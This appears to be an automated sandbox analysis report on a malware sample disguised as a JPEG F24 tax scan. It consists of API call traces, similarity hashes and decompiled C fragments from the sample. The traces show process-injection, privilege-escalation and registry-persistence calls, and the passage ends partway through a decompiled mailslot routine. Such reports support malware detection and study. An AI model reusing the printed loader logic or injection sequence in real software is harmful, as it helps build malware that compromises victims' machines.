    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name: d3d8sext.exe
Process MD5: E5C7B986B6FD3733504DB3FD6D6FAADA
Total matches: 156
Initial sample Analysis ID: 68428
Initial sample SHA 256: 9D2D7459EDA5BC0063FC6EF47DE20AFBFA28AA6981F0EE63D90AE3E10EC4F835
Initial sample name: scansione_F24_.jpg.exe

Similar Executed Functions

Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}
APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
